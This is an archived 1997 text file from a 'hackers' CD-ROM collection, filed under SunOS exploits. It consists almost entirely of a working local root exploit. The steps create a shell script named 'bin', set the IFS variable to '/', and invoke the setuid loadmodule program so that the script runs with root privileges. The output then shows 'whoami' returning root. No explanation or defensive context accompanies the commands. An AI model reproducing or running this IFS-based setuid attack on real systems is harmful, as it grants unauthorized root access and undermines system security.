home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / sunos / sun-lo~2.asc < prev    next >
Encoding:
Text File  |  1997-03-11  |  209 b   |  13 lines

  1.  
  2.  
  3.  
  4.  
  5. %cat > ~/bin/bin
  6.  
  7. #!/bin/sh
  8.  
  9. sh -i
  10.  
  11. ^D
  12.  
  13. %chmod 755 ~/bin/bin
  14.  
  15. %setenv IFS /
  16.  
  17. %cd ~/bin
  18.  
  19. %/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
  20.  
  21. # whoami
  22.  
  23. root
  24.  
  25.